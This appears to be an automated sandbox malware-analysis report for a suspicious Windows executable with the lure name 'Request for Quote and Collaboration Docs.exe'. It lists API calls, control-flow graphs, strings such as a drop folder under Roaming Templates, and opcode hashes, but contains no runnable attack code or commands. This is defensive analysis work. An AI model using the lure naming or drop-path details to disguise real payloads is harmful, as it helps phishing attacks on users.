                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                          • API String ID: 900638850-1230650788
                                                                                          • Opcode ID: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                                          • Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
                                                                                          • Opcode Fuzzy Hash: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                                          • Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 545 405772-405798 call 405a3d 548 4057b1-4057b8 545->548 549 40579a-4057ac DeleteFileW 545->549 551 4057ba-4057bc 548->551 552 4057cb-4057db call 405eea 548->552 550 40592e-405932 549->550 553 4057c2-4057c5 551->553 554 4058dc-4058e1 551->554 558 4057ea-4057eb call 405981 552->558 559 4057dd-4057e8 lstrcatW 552->559 553->552 553->554 554->550 557 4058e3-4058e6 554->557 560 4058f0-4058f8 call 40622d 557->560 561 4058e8-4058ee 557->561 562 4057f0-4057f4 558->562 559->562 560->550 568 4058fa-40590e call 405935 call 40572a 560->568 561->550 566 405800-405806 lstrcatW 562->566 567 4057f6-4057fe 562->567 569 40580b-405827 lstrlenW FindFirstFileW 566->569 567->566 567->569 585 405910-405913 568->585 586 405926-405929 call 405194 568->586 570 4058d1-4058d5 569->570 571 40582d-405835 569->571 570->554 576 4058d7 570->576 573 405855-405869 call 405eea 571->573 574 405837-40583f 571->574 587 405880-40588b call 40572a 573->587 588 40586b-405873 573->588 577 405841-405849 574->577 578 4058b4-4058c4 FindNextFileW 574->578 576->554 577->573 581 40584b-405853 577->581 578->571 584 4058ca-4058cb FindClose 578->584 581->573 581->578 584->570 585->561 589 405915-405924 call 405194 call 405d84 585->589 586->550 598 4058ac-4058af call 405194 587->598 599 40588d-405890 587->599 588->578 590 405875-40587e call 405772 588->590 589->550 590->578 598->578 602 405892-4058a2 call 405194 call 405d84 599->602 603 4058a4-4058aa 599->603 602->578 603->578
                                                                                          APIs
                                                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"), ref: 0040579B
                                                                                          • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"), ref: 004057E3
                                                                                          • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"), ref: 00405806
                                                                                          • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"), ref: 0040580C
                                                                                          • FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"), ref: 0040581C
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                                          • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                                          Strings
                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405780
                                                                                          • "C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe", xrefs: 0040577B
                                                                                          • \*.*, xrefs: 004057DD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                          • String ID: "C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                          • API String ID: 2035342205-249418055
                                                                                          • Opcode ID: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                          • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                                          • Opcode Fuzzy Hash: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                          • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                          • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                                          • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                          • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,76F92EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,76F92EE0), ref: 00406238
                                                                                          • FindClose.KERNEL32(00000000), ref: 00406244
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFileFirst
                                                                                          • String ID: WB
                                                                                          • API String ID: 2295610775-2854515933
                                                                                          • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                          • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
                                                                                          • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                          • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                          • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                          • String ID:
                                                                                          • API String ID: 310444273-0
                                                                                          • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                          • Instruction ID: 46d0f10fa6fb29b22d4bf355a321a76136a9e9be6b3571ea53230c25cba9bd22
                                                                                          • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                          • Instruction Fuzzy Hash: 02E0CD36A08120ABC7115B309D44D6773BCAFE9601305053DF505F6240C774AC1297A9
                                                                                          APIs
                                                                                          • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                          Strings
                                                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Grope, xrefs: 004020FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateInstance
                                                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Grope
                                                                                          • API String ID: 542301482-1590673197
                                                                                          • Opcode ID: 57f4e40bbc1eb8bc1193217420ff9fbc7ed6710042c31834a7e6d6b3d9fbdd66
                                                                                          • Instruction ID: b9114a0b4d3c9f05545c6126c0c632b8b73b1fcf7d0bd01aa9b6132af3d7cd36
                                                                                          • Opcode Fuzzy Hash: 57f4e40bbc1eb8bc1193217420ff9fbc7ed6710042c31834a7e6d6b3d9fbdd66
                                                                                          • Instruction Fuzzy Hash: 4B414F75A00105BFCB00DFA4C988EAE7BB5AF49318B20416AF505EF2D1D679AD41CB55

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 238 4038b4-4038cc call 406254 241 4038e0-403917 call 405db7 238->241 242 4038ce-4038de call 405e31 238->242 247 403919-40392a call 405db7 241->247 248 40392f-403935 lstrcatW 241->248 251 40393a-403963 call 403b8a call 405a3d 242->251 247->248 248->251 256 4039f5-4039fd call 405a3d 251->256 257 403969-40396e 251->257 263 403a0b-403a30 LoadImageW 256->263 264 4039ff-403a06 call 405f0c 256->264 257->256 259 403974-40399c call 405db7 257->259 259->256 265 40399e-4039a2 259->265 267 403ab1-403ab9 call 40140b 263->267 268 403a32-403a62 RegisterClassW 263->268 264->263 269 4039b4-4039c0 lstrlenW 265->269 270 4039a4-4039b1 call 405962 265->270 281 403ac3-403ace call 403b8a 267->281 282 403abb-403abe 267->282 271 403b80 268->271 272 403a68-403aac SystemParametersInfoW CreateWindowExW 268->272 276 4039c2-4039d0 lstrcmpiW 269->276 277 4039e8-4039f0 call 405935 call 405eea 269->277 270->269 274 403b82-403b89 271->274 272->267 276->277 280 4039d2-4039dc GetFileAttributesW 276->280 277->256 284 4039e2-4039e3 call 405981 280->284 285 4039de-4039e0 280->285 291 403ad4-403af1 ShowWindow LoadLibraryW 281->291 292 403b57-403b5f call 405267 281->292 282->274 284->277 285->277 285->284 293 403af3-403af8 LoadLibraryW 291->293 294 403afa-403b0c GetClassInfoW 291->294 300 403b61-403b67 292->300 301 403b79-403b7b call 40140b 292->301 293->294 296 403b24-403b47 DialogBoxParamW call 40140b 294->296 297 403b0e-403b1e GetClassInfoW RegisterClassW 294->297 303 403b4c-403b55 call 403804 296->303 297->296 300->282 304 403b6d-403b74 call 40140b 300->304 301->271 303->274 304->282
                                                                                          APIs
                                                                                            • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                            • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                            • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                          • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,76F93420,00000000,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"), ref: 00403935
                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B5
                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 004039D3
                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet), ref: 00403A1C
                                                                                            • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                          • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AED
                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                                          • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                                          • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                          • String ID: "C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                          • API String ID: 914957316-2082145259
                                                                                          • Opcode ID: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                          • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                                          • Opcode Fuzzy Hash: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                          • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 309 403c57-403c69 310 403daa-403db9 309->310 311 403c6f-403c75 309->311 313 403e08-403e1d 310->313 314 403dbb-403e03 GetDlgItem * 2 call 40412f SetClassLongW call 40140b 310->314 311->310 312 403c7b-403c84 311->312 315 403c86-403c93 SetWindowPos 312->315 316 403c99-403c9c 312->316 318 403e5d-403e62 call 40417b 313->318 319 403e1f-403e22 313->319 314->313 315->316 321 403cb6-403cbc 316->321 322 403c9e-403cb0 ShowWindow 316->322 328 403e67-403e82 318->328 324 403e24-403e2f call 401389 319->324 325 403e55-403e57 319->325 329 403cd8-403cdb 321->329 330 403cbe-403cd3 DestroyWindow 321->330 322->321 324->325 340 403e31-403e50 SendMessageW 324->340 325->318 327 4040fc 325->327 335 4040fe-404105 327->335 333 403e84-403e86 call 40140b 328->333 334 403e8b-403e91 328->334 338 403cdd-403ce9 SetWindowLongW 329->338 339 403cee-403cf4 329->339 336 4040d9-4040df 330->336 333->334 343 403e97-403ea2 334->343 344 4040ba-4040d3 DestroyWindow EndDialog 334->344 336->327 341 4040e1-4040e7 336->341 338->335 345 403d97-403da5 call 404196 339->345 346 403cfa-403d0b GetDlgItem 339->346 340->335 341->327 350 4040e9-4040f2 ShowWindow 341->350 343->344 351 403ea8-403ef5 call 405f0c call 40412f * 3 GetDlgItem 343->351 344->336 345->335 347 403d2a-403d2d 346->347 348 403d0d-403d24 SendMessageW IsWindowEnabled 346->348 352 403d32-403d35 347->352 353 403d2f-403d30 347->353 348->327 348->347 350->327 379 403ef7-403efc 351->379 380 403eff-403f3b ShowWindow KiUserCallbackDispatcher call 404151 EnableWindow 351->380 357 403d43-403d48 352->357 358 403d37-403d3d 352->358 356 403d60-403d65 call 404108 353->356 356->345 360 403d7e-403d91 SendMessageW 357->360 362 403d4a-403d50 357->362 358->360 361 403d3f-403d41 358->361 360->345 361->356 365 403d52-403d58 call 40140b 362->365 366 403d67-403d70 call 40140b 362->366 377 403d5e 365->377 366->345 375 403d72-403d7c 366->375 375->377 377->356 379->380 383 403f40 380->383 384 403f3d-403f3e 380->384 385 403f42-403f70 GetSystemMenu EnableMenuItem SendMessageW 383->385 384->385 386 403f72-403f83 SendMessageW 385->386 387 403f85 385->387 388 403f8b-403fc9 call 404164 call 405eea lstrlenW call 405f0c SetWindowTextW call 401389 386->388 387->388 388->328 397 403fcf-403fd1 388->397 397->328 398 403fd7-403fdb 397->398 399 403ffa-40400e DestroyWindow 398->399 400 403fdd-403fe3 398->400 399->336 402 404014-404041 CreateDialogParamW 399->402 400->327 401 403fe9-403fef 400->401 401->328 403 403ff5 401->403 402->336 404 404047-40409e call 40412f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 402->404 403->327 404->327 409 4040a0-4040b8 ShowWindow call 40417b 404->409 409->336
                                                                                          APIs
                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                                          • ShowWindow.USER32(?), ref: 00403CB0
                                                                                          • DestroyWindow.USER32 ref: 00403CC4
                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                                          • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F18
                                                                                          • EnableWindow.USER32(?,?), ref: 00403F33
                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                                          • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                                          • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 3282139019-0
                                                                                          • Opcode ID: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                          • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                                          • Opcode Fuzzy Hash: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                          • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
